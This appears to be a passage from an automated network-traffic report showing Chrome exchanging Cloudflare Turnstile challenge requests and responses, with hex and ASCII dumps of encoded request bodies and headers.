                                        2025-01-07 21:06:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3c 00 00 00 47 08 02 00 00 00 d4 7b b3 27 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDR<G{'IDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.449782104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:05 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 33367
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:05 UTC16384OUTData Raw: 76 5f 38 66 65 36 65 38 62 63 62 64 63 35 37 64 31 31 3d 67 4c 77 31 66 78 50 6d 79 78 79 74 77 74 55 50 61 6c 77 31 64 4c 6c 68 50 78 30 72 6a 30 74 31 50 71 74 78 33 30 66 31 6c 4c 6b 74 64 67 30 69 31 47 79 50 57 30 31 31 49 35 2d 31 30 69 45 34 30 33 4d 70 30 5a 61 47 30 47 4f 30 4b 66 72 4c 31 6b 30 49 70 74 6e 36 30 30 63 70 70 55 73 31 47 58 33 30 39 70 74 37 30 67 57 62 31 57 68 75 57 70 78 45 30 64 25 32 62 62 35 58 6b 30 55 4e 4f 6a 35 6a 6c 24 34 72 70 4a 31 67 79 31 30 67 62 77 30 6a 31 74 5a 30 78 4c 30 6c 66 77 30 32 79 45 50 47 31 50 64 54 6c 6c 78 47 6a 45 63 78 70 30 42 47 32 38 50 4c 24 47 4e 67 30 74 45 4f 75 4b 73 46 31 30 24 55 31 70 56 71 72 49 32 64 31 31 77 67 50 49 53 7a 47 48 32 6f 70 78 24 58 2b 48 42 65 70 43 67 49 70 75 6c 47
                                        Data Ascii: v_8fe6e8bcbdc57d11=gLw1fxPmyxytwtUPalw1dLlhPx0rj0t1Pqtx30f1lLktdg0i1GyPW011I5-10iE403Mp0ZaG0GO0KfrL1k0Iptn600cppUs1GX309pt70gWb1WhuWpxE0d%2bb5Xk0UNOj5jl$4rpJ1gy10gbw0j1tZ0xL0lfw02yEPG1PdTllxGjEcxp0BG28PL$GNg0tEOuKsF10$U1pVqrI2d11wgPISzGH2opx$X+HBepCgIpulG
                                        2025-01-07 21:06:05 UTC16384OUTData Raw: 78 61 50 69 70 30 30 75 43 4c 50 45 38 24 30 47 31 39 71 6e 30 45 36 57 42 50 54 71 6a 53 78 48 70 34 30 67 54 71 54 4f 70 30 77 42 6c 31 50 47 30 6c 30 74 48 30 74 63 2b 2b 48 77 30 6d 73 78 31 6c 35 71 42 30 48 46 75 79 30 6d 6a 6a 30 47 4c 50 4e 24 30 70 45 47 50 72 30 42 70 38 37 62 53 30 34 70 38 2d 50 43 30 75 31 78 69 50 6a 30 70 71 78 31 50 6d 77 30 71 38 55 50 36 30 56 71 38 2d 30 65 30 24 78 42 47 30 53 30 50 55 78 41 50 4c 32 75 41 78 47 30 6b 30 46 4e 38 78 70 42 30 50 69 47 72 50 47 70 34 4d 74 30 50 33 30 34 31 6c 35 30 63 30 6e 71 78 4d 50 71 31 30 77 59 70 50 44 31 74 77 30 39 62 69 30 70 79 45 71 30 52 30 6f 70 38 6e 50 5a 30 6d 5a 30 2b 50 78 31 6f 31 47 6e 30 79 31 46 68 45 78 30 6b 30 50 71 50 66 50 55 30 41 71 45 41 67 6d 71 46 31 74
                                        Data Ascii: xaPip00uCLPE8$0G19qn0E6WBPTqjSxHp40gTqTOp0wBl1PG0l0tH0tc++Hw0msx1l5qB0HFuy0mjj0GLPN$0pEGPr0Bp87bS04p8-PC0u1xiPj0pqx1Pmw0q8UP60Vq8-0e0$xBG0S0PUxAPL2uAxG0k0FN8xpB0PiGrPGp4Mt0P3041l50c0nqxMPq10wYpPD1tw09bi0pyEq0R0op8nPZ0mZ0+Px1o1Gn0y1FhEx0k0PqPfPU0AqEAgmqF1t
                                        2025-01-07 21:06:05 UTC599OUTData Raw: 68 77 41 4e 67 79 50 33 30 62 5a 6a 30 6e 37 76 54 79 55 2d 43 69 42 70 50 6c 77 47 2b 46 6e 50 4f 71 75 31 47 69 30 74 6d 43 4b 52 70 50 66 31 4d 6e 30 4d 30 36 47 71 4a 24 61 35 48 62 59 31 47 48 30 6c 30 47 31 30 69 56 58 43 36 37 4a 42 45 44 43 79 4a 46 72 57 69 68 64 46 67 6d 4f 7a 2b 4f 77 38 58 74 76 46 49 69 76 30 35 4a 31 75 68 38 49 66 37 55 71 49 43 66 2b 46 44 66 33 34 42 57 6f 79 61 71 38 72 44 70 31 64 55 73 74 41 4c 48 44 70 64 42 57 36 43 59 63 61 35 4d 55 54 24 73 6b 32 42 47 30 44 59 69 67 65 76 30 72 44 37 6d 57 44 48 6b 7a 69 55 4e 76 47 54 35 44 53 59 66 30 77 35 71 31 57 6e 76 5a 6b 2d 4c 35 65 30 50 61 4c 6e 36 48 30 48 6f 49 57 31 77 76 7a 37 33 78 31 35 67 71 55 78 61 7a 70 31 46 57 6e 58 4c 53 30 68 55 55 55 49 46 30 59 68 38 67
                                        Data Ascii: hwANgyP30bZj0n7vTyU-CiBpPlwG+FnPOqu1Gi0tmCKRpPf1Mn0M06GqJ$a5HbY1GH0l0G10iVXC67JBEDCyJFrWihdFgmOz+Ow8XtvFIiv05J1uh8If7UqICf+FDf34BWoyaq8rDp1dUstALHDpdBW6CYca5MUT$sk2BG0DYigev0rD7mWDHkziUNvGT5DSYf0w5q1WnvZk-L5e0PaLn6H0HoIW1wvz73x15gqUxazp1FWnXLS0hUUUIF0Yh8g
                                        2025-01-07 21:06:06 UTC318INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:06 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 26264
                                        Connection: close
                                        cf-chl-gen: L6bQIWkXPpqK9cvM97bnFj2IPXctb/RV3ectByFdtFBA6iQ3W11bLPT/2IjtZqOciy0=$0QUqHVcbwkc9klG0
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8e2fd4d435c-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:06 UTC1051INData Raw: 69 6e 68 74 62 4a 5a 70 62 56 69 4b 57 58 31 65 67 70 56 67 65 5a 6d 54 6f 34 56 38 64 57 53 4a 67 48 68 76 6f 6f 39 39 6a 47 2b 4d 63 71 6d 51 68 4a 71 31 69 62 4e 38 6e 6e 36 2b 72 49 79 68 6b 62 4b 55 76 34 5a 39 6c 38 65 4f 79 6f 37 46 6a 63 44 42 71 5a 43 66 70 5a 44 58 78 4b 61 58 31 4d 37 65 6e 73 4b 38 77 4f 62 42 6e 38 54 6d 32 75 44 74 37 4f 54 4d 77 36 33 42 79 36 37 7a 74 76 48 30 75 4f 54 46 79 39 66 72 30 50 63 42 36 37 7a 68 32 4e 33 56 78 2f 6a 43 41 67 33 72 2f 63 6a 38 36 77 51 4c 2f 4f 30 47 44 67 50 59 42 41 7a 72 2b 67 2f 61 48 51 41 4c 41 43 44 69 46 67 6b 48 42 68 66 6f 41 67 6a 67 44 43 6a 70 43 54 41 72 4d 67 45 74 4b 50 59 4e 4a 76 6b 57 4d 76 73 78 48 7a 55 37 4d 44 4d 37 42 45 45 57 49 42 67 73 53 6b 38 6e 44 55 4a 4f 53 6b 6b
                                        Data Ascii: inhtbJZpbViKWX1egpVgeZmTo4V8dWSJgHhvoo99jG+McqmQhJq1ibN8nn6+rIyhkbKUv4Z9l8eOyo7FjcDBqZCfpZDXxKaX1M7ensK8wObBn8Tm2uDt7OTMw63By67ztvH0uOTFy9fr0PcB67zh2N3Vx/jCAg3r/cj86wQL/O0GDgPYBAzr+g/aHQALACDiFgkHBhfoAgjgDCjpCTArMgEtKPYNJvkWMvsxHzU7MDM7BEEWIBgsSk8nDUJOSkk
                                        2025-01-07 21:06:06 UTC1369INData Raw: 6c 62 57 31 39 6b 6f 43 50 6a 49 75 51 69 49 4b 52 63 5a 71 32 69 71 75 67 66 72 61 34 74 6e 79 35 76 35 71 5a 74 38 4c 49 70 59 54 43 6d 5a 6d 6c 7a 35 44 43 72 37 43 4f 6f 35 66 4d 73 4e 4f 79 76 71 76 67 6b 35 76 45 77 4b 37 6e 33 4c 37 61 76 65 65 2b 37 75 50 51 76 71 2f 74 37 75 72 71 77 75 75 34 36 74 6e 49 2b 4f 72 39 76 63 7a 39 7a 67 58 33 77 65 41 49 35 66 51 49 43 50 67 42 33 65 33 34 43 51 45 46 30 4f 54 78 37 4f 37 55 32 52 48 55 48 41 6a 77 33 67 37 74 37 68 34 46 2f 67 6b 46 35 4f 41 69 47 66 6a 6e 41 69 51 50 43 44 44 75 4a 69 63 55 38 41 30 36 48 50 6a 31 2b 54 38 39 47 52 33 36 4e 2f 73 2b 50 52 34 2f 45 79 55 69 4f 45 6b 47 49 53 49 50 54 42 51 75 52 79 63 74 54 54 4e 61 48 53 5a 58 53 68 74 5a 4c 52 39 69 4d 46 78 49 4b 44 77 70 52 69
                                        Data Ascii: lbW19koCPjIuQiIKRcZq2iqugfra4tny5v5qZt8LIpYTCmZmlz5DCr7COo5fMsNOyvqvgk5vEwK7n3L7avee+7uPQvq/t7urqwuu46tnI+Or9vcz9zgX3weAI5fQICPgB3e34CQEF0OTx7O7U2RHUHAjw3g7t7h4F/gkF5OAiGfjnAiQPCDDuJicU8A06HPj1+T89GR36N/s+PR4/EyUiOEkGISIPTBQuRyctTTNaHSZXShtZLR9iMFxIKDwpRi
                                        2025-01-07 21:06:06 UTC1369INData Raw: 66 57 32 57 6a 36 4b 53 69 49 31 79 64 6f 71 55 66 63 43 63 6c 4c 4f 4f 75 61 53 2b 76 71 61 2f 69 72 6e 44 77 73 32 36 78 73 2b 30 76 38 43 78 6b 62 62 47 74 73 36 72 7a 74 2b 39 31 74 48 53 77 5a 75 6c 32 70 2f 61 6f 4f 72 70 78 4d 43 2b 79 4b 6a 75 76 4d 58 53 72 38 2f 67 34 64 57 31 7a 2b 33 31 79 63 7a 35 38 50 72 61 77 4f 66 33 79 4d 62 72 39 37 34 4e 2b 66 72 4a 30 41 50 7a 34 66 58 6b 7a 74 51 61 45 51 6a 75 44 76 33 62 47 42 4c 30 44 50 34 6c 47 77 44 77 49 78 67 67 39 43 30 44 49 51 41 7a 4c 52 30 47 4c 69 45 6e 4c 51 59 74 4a 53 34 73 45 66 6e 38 4d 79 77 43 49 76 30 78 4f 53 59 72 4f 68 30 62 43 55 6f 4d 54 67 38 6b 45 6b 78 44 46 31 63 6c 57 31 41 74 50 46 30 65 4f 54 63 2b 54 6d 56 41 52 54 56 6c 49 43 42 43 52 42 39 58 62 32 35 4c 55 6b 63
                                        Data Ascii: fW2Wj6KSiI1ydoqUfcCclLOOuaS+vqa/irnDws26xs+0v8CxkbbGts6rzt+91tHSwZul2p/aoOrpxMC+yKjuvMXSr8/g4dW1z+31ycz58PrawOf3yMbr974N+frJ0APz4fXkztQaEQjuDv3bGBL0DP4lGwDwIxgg9C0DIQAzLR0GLiEnLQYtJS4sEfn8MywCIv0xOSYrOh0bCUoMTg8kEkxDF1clW1AtPF0eOTc+TmVARTVlICBCRB9Xb25LUkc
                                        2025-01-07 21:06:06 UTC1369INData Raw: 49 79 77 64 58 36 52 6e 62 7a 42 6c 4b 43 46 67 70 71 6a 74 49 61 65 70 70 36 58 6a 36 2f 4b 6f 73 50 41 6f 37 50 58 7a 4d 62 4c 7a 4a 75 5a 6d 36 79 36 72 4f 48 44 76 62 4f 75 30 63 50 6d 75 63 50 62 70 73 37 62 7a 75 4c 53 73 4d 37 6e 31 2b 2f 48 37 50 4c 57 36 72 72 4d 2b 77 4b 2b 38 4f 2f 59 38 77 62 76 43 51 62 56 78 38 58 72 44 4d 6b 48 37 66 76 6c 30 76 48 33 7a 52 63 4d 31 68 76 77 43 68 7a 57 39 4f 72 78 32 69 51 6c 2b 69 45 64 41 79 41 71 49 2b 66 39 44 65 67 44 43 66 34 72 48 67 54 77 44 52 63 57 4a 50 6f 4e 4c 54 48 34 4e 6a 77 6a 46 6a 51 2f 51 53 49 42 51 45 67 57 49 6a 30 62 51 42 46 45 45 45 4e 57 50 78 45 6b 47 45 30 78 56 44 4d 2f 4c 47 45 55 5a 42 6f 76 57 6b 39 56 61 54 77 30 56 30 63 33 59 46 70 4c 54 6d 6c 4e 55 6b 4e 45 51 58 4e 48
                                        Data Ascii: IywdX6RnbzBlKCFgpqjtIaepp6Xj6/KosPAo7PXzMbLzJuZm6y6rOHDvbOu0cPmucPbps7bzuLSsM7n1+/H7PLW6rrM+wK+8O/Y8wbvCQbVx8XrDMkH7fvl0vH3zRcM1hvwChzW9Orx2iQl+iEdAyAqI+f9DegDCf4rHgTwDRcWJPoNLTH4NjwjFjQ/QSIBQEgWIj0bQBFEEENWPxEkGE0xVDM/LGEUZBovWk9VaTw0V0c3YFpLTmlNUkNEQXNH
                                        2025-01-07 21:06:06 UTC1369INData Raw: 2b 73 65 63 47 2f 6e 59 61 6c 79 62 69 42 74 35 32 41 68 63 43 51 76 72 4c 4f 6c 4d 4c 51 78 4a 66 47 70 73 79 2b 72 74 66 67 72 4c 7a 6a 74 72 33 4f 70 2b 66 54 75 4e 7a 41 70 4d 6e 74 77 37 37 4e 73 73 66 79 79 64 62 77 31 4c 61 31 39 39 4f 36 2f 50 61 35 77 62 72 56 33 4d 44 51 79 4e 6a 37 41 38 54 57 36 2b 51 53 35 67 6b 41 39 4f 30 46 39 75 30 58 35 64 4c 35 37 41 7a 6e 2b 4f 38 51 32 53 48 79 45 2f 34 64 35 4e 7a 7a 39 4f 4d 72 45 50 37 39 2b 79 30 6e 36 77 34 75 47 50 67 6f 4d 66 67 4b 39 50 59 72 43 30 41 54 2f 67 49 50 50 54 73 53 49 6b 45 4a 47 30 34 76 44 79 41 71 55 68 34 52 4c 6a 63 54 46 42 45 57 58 68 30 31 47 79 38 55 4b 30 4d 69 47 46 52 6c 4b 53 6f 7a 50 44 63 70 62 45 74 6c 4c 48 4a 79 58 30 42 51 54 46 59 35 55 32 35 4a 52 6b 64 79 61
                                        Data Ascii: +secG/nYalybiBt52AhcCQvrLOlMLQxJfGpsy+rtfgrLzjtr3Op+fTuNzApMntw77Nssfyydbw1La199O6/Pa5wbrV3MDQyNj7A8TW6+QS5gkA9O0F9u0X5dL57Azn+O8Q2SHyE/4d5Nzz9OMrEP79+y0n6w4uGPgoMfgK9PYrC0AT/gIPPTsSIkEJG04vDyAqUh4RLjcTFBEWXh01Gy8UK0MiGFRlKSozPDcpbEtlLHJyX0BQTFY5U25JRkdya
                                        2025-01-07 21:06:06 UTC1369INData Raw: 51 70 62 2b 37 74 63 47 74 6a 4a 33 43 6e 72 47 70 79 62 61 78 6f 73 47 70 6a 61 72 52 76 4d 2b 73 30 5a 33 5a 6d 74 62 6e 6f 38 48 41 6f 73 7a 4e 7a 4c 76 46 78 38 7a 4f 71 39 58 53 72 76 4c 50 31 74 71 37 32 50 4c 61 79 4e 72 74 30 77 44 6c 38 76 7a 6c 33 4f 4c 71 78 4f 33 38 33 75 41 48 2f 73 33 37 39 66 33 6d 38 65 73 4b 44 4d 33 7a 2b 76 76 38 44 50 72 2b 34 77 59 59 33 67 6e 2b 43 41 63 4a 44 51 55 69 2b 2b 59 6e 44 2f 77 50 49 67 67 30 47 69 63 78 47 68 45 58 48 2f 67 69 4d 52 4d 56 4f 7a 4d 43 4d 43 6f 79 47 79 59 67 50 6b 41 43 4b 43 38 77 4d 54 4d 30 4d 7a 55 34 4f 44 77 78 50 6a 77 38 57 68 4d 36 48 78 77 74 51 6c 78 59 55 6c 35 4b 4b 54 70 66 4f 30 35 47 5a 6c 4e 4f 50 31 35 47 4b 6b 64 75 57 57 78 4a 62 6a 70 32 4e 31 39 32 64 31 78 34 50 30
                                        Data Ascii: Qpb+7tcGtjJ3CnrGpybaxosGpjarRvM+s0Z3Zmtbno8HAoszNzLvFx8zOq9XSrvLP1tq72PLayNrt0wDl8vzl3OLqxO383uAH/s379f3m8esKDM3z+vv8DPr+4wYY3gn+CAcJDQUi++YnD/wPIgg0GicxGhEXH/giMRMVOzMCMCoyGyYgPkACKC8wMTM0MzU4ODwxPjw8WhM6HxwtQlxYUl5KKTpfO05GZlNOP15GKkduWWxJbjp2N192d1x4P0
                                        2025-01-07 21:06:06 UTC1369INData Raw: 69 37 69 75 78 4a 4f 30 74 4b 50 43 74 37 47 53 76 4c 4b 34 6c 70 66 4c 77 4c 2f 45 77 38 50 5a 79 4c 50 48 78 38 7a 57 7a 4c 76 61 30 64 44 50 34 74 7a 53 72 63 7a 5a 31 37 4c 79 35 39 6a 78 39 75 76 65 75 76 4c 75 33 62 37 36 38 75 66 58 39 76 58 6f 78 67 66 6d 37 2b 2f 30 33 2f 50 79 31 2f 6e 32 30 67 76 37 2b 2f 73 62 2f 76 34 56 2b 41 55 45 42 42 2f 2b 43 66 63 62 44 41 6e 6d 47 78 41 4b 36 69 4d 56 46 4f 34 76 49 78 6b 59 4e 79 63 64 44 43 45 4d 49 42 41 37 49 79 55 6b 4d 7a 51 6f 50 51 77 72 4c 52 73 6c 4d 54 45 77 50 7a 51 30 4a 45 38 36 4e 52 4e 48 52 6a 59 58 57 30 41 39 56 6c 39 4e 52 54 52 4a 50 30 63 69 4b 44 68 4d 54 47 39 5a 55 43 74 6e 56 56 52 45 63 32 4a 53 4d 33 64 64 57 7a 64 7a 59 6d 46 51 67 32 56 6b 50 6c 31 78 5a 30 4e 45 59 32 78
                                        Data Ascii: i7iuxJO0tKPCt7GSvLK4lpfLwL/Ew8PZyLPHx8zWzLva0dDP4tzSrczZ17Ly59jx9uveuvLu3b768ufX9vXoxgfm7+/03/Py1/n20gv7+/sb/v4V+AUEBB/+CfcbDAnmGxAK6iMVFO4vIxkYNycdDCEMIBA7IyUkMzQoPQwrLRslMTEwPzQ0JE86NRNHRjYXW0A9Vl9NRTRJP0ciKDhMTG9ZUCtnVVREc2JSM3ddWzdzYmFQg2VkPl1xZ0NEY2x


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.449783104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:06 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:06 UTC379INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 21:06:06 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        cf-chl-out: W0JsfAtzUkT6tWFs1q53m3YEvQcG63tQIbY=$EbjPqAAeW9Ipj8Ql
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8e88aad78dc-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.449784104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:15 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 35763
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:15 UTC16384OUTData Raw: 76 5f 38 66 65 36 65 38 62 63 62 64 63 35 37 64 31 31 3d 67 4c 77 31 66 78 50 6d 79 78 79 74 77 74 55 50 61 6c 77 31 64 4c 6c 68 50 78 30 72 6a 30 74 31 50 71 74 78 33 30 66 31 6c 4c 6b 74 64 67 30 69 31 47 79 50 57 30 31 31 49 35 2d 31 30 69 45 34 30 33 4d 70 30 5a 61 47 30 47 4f 30 4b 66 72 4c 31 6b 30 49 70 74 6e 36 30 30 63 70 70 55 73 31 47 58 33 30 39 70 74 37 30 67 57 62 31 57 68 75 57 70 78 45 30 64 25 32 62 62 35 58 6b 30 55 4e 4f 6a 35 6a 6c 24 34 72 70 4a 31 67 79 31 30 67 62 77 30 6a 31 74 5a 30 78 4c 30 6c 66 77 30 32 79 45 50 47 31 50 64 54 6c 6c 78 47 6a 45 63 78 70 30 42 47 32 38 50 4c 24 47 4e 67 30 74 45 4f 75 4b 73 46 31 30 24 55 31 70 56 71 72 49 32 64 31 31 77 67 50 49 53 7a 47 48 32 6f 70 78 24 58 2b 48 42 65 70 43 67 49 70 75 6c 47
                                        Data Ascii: v_8fe6e8bcbdc57d11=gLw1fxPmyxytwtUPalw1dLlhPx0rj0t1Pqtx30f1lLktdg0i1GyPW011I5-10iE403Mp0ZaG0GO0KfrL1k0Iptn600cppUs1GX309pt70gWb1WhuWpxE0d%2bb5Xk0UNOj5jl$4rpJ1gy10gbw0j1tZ0xL0lfw02yEPG1PdTllxGjEcxp0BG28PL$GNg0tEOuKsF10$U1pVqrI2d11wgPISzGH2opx$X+HBepCgIpulG
                                        2025-01-07 21:06:15 UTC16384OUTData Raw: 78 61 50 69 70 30 30 75 43 4c 50 45 38 24 30 47 31 39 71 6e 30 45 36 57 42 50 54 71 6a 53 78 48 70 34 30 67 54 71 54 4f 70 30 77 42 6c 31 50 47 30 6c 30 74 48 30 74 63 2b 2b 48 77 30 6d 73 78 31 6c 35 71 42 30 48 46 75 79 30 6d 6a 6a 30 47 4c 50 4e 24 30 70 45 47 50 72 30 42 70 38 37 62 53 30 34 70 38 2d 50 43 30 75 31 78 69 50 6a 30 70 71 78 31 50 6d 77 30 71 38 55 50 36 30 56 71 38 2d 30 65 30 24 78 42 47 30 53 30 50 55 78 41 50 4c 32 75 41 78 47 30 6b 30 46 4e 38 78 70 42 30 50 69 47 72 50 47 70 34 4d 74 30 50 33 30 34 31 6c 35 30 63 30 6e 71 78 4d 50 71 31 30 77 59 70 50 44 31 74 77 30 39 62 69 30 70 79 45 71 30 52 30 6f 70 38 6e 50 5a 30 6d 5a 30 2b 50 78 31 6f 31 47 6e 30 79 31 46 68 45 78 30 6b 30 50 71 50 66 50 55 30 41 71 45 41 67 6d 71 46 31 74
                                        Data Ascii: xaPip00uCLPE8$0G19qn0E6WBPTqjSxHp40gTqTOp0wBl1PG0l0tH0tc++Hw0msx1l5qB0HFuy0mjj0GLPN$0pEGPr0Bp87bS04p8-PC0u1xiPj0pqx1Pmw0q8UP60Vq8-0e0$xBG0S0PUxAPL2uAxG0k0FN8xpB0PiGrPGp4Mt0P3041l50c0nqxMPq10wYpPD1tw09bi0pyEq0R0op8nPZ0mZ0+Px1o1Gn0y1FhEx0k0PqPfPU0AqEAgmqF1t
                                        2025-01-07 21:06:15 UTC2995OUTData Raw: 78 7a 50 4f 69 2b 79 50 76 78 58 69 6b 7a 49 4e 4d 47 48 6d 31 47 62 66 44 31 6d 77 6c 71 62 70 31 38 24 4f 6b 65 6d 77 39 36 47 39 78 46 45 4e 6f 4b 79 30 65 44 54 31 50 6f 2b 6d 34 61 4f 30 2b 6e 74 50 53 39 78 7a 50 71 6f 4e 56 6c 32 30 78 47 30 38 50 77 30 36 69 36 4a 55 2b 35 75 70 78 4c 78 2b 49 2d 56 4e 2d 44 6b 50 34 66 54 53 65 4b 24 24 4c 4e 4c 72 75 2b 35 62 4a 39 47 79 50 6f 73 4c 7a 74 45 61 66 78 34 30 78 32 72 73 69 4c 64 30 56 4d 49 30 64 30 38 74 4d 74 30 24 4a 68 4f 7a 32 69 7a 71 38 64 57 67 53 37 57 6c 4d 30 41 5a 49 4c 70 70 30 46 69 54 31 77 6c 65 4e 30 50 30 50 68 43 68 66 66 48 50 69 78 73 47 4a 62 38 45 2b 67 77 32 74 55 47 2b 33 30 64 70 30 6d 30 76 31 54 31 38 79 30 58 53 4e 59 37 78 45 47 68 74 48 74 59 31 6e 48 32 57 76 68 2b
                                        Data Ascii: xzPOi+yPvxXikzINMGHm1GbfD1mwlqbp18$Okemw96G9xFENoKy0eDT1Po+m4aO0+ntPS9xzPqoNVl20xG08Pw06i6JU+5upxLx+I-VN-DkP4fTSeK$$LNLru+5bJ9GyPosLztEafx40x2rsiLd0VMI0d08tMt0$JhOz2izq8dWgS7WlM0AZILpp0FiT1wleN0P0PhChffHPixsGJb8E+gw2tUG+30dp0m0v1T18y0XSNY7xEGhtHtY1nH2Wvh+
                                        2025-01-07 21:06:15 UTC1361INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:15 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4776
                                        Connection: close
                                        cf-chl-out: ahJBTO9HZGJQqOLZst5XEoEee4h+F8JBdRo3LHT7KIam/B5IOsqIzYESi1rVfhnMDWJA1hnZMTNb/gwBqVEKk+oJglj33+6dc5Yf88yOOw==$1ZBVA9ucmR+CbfAr
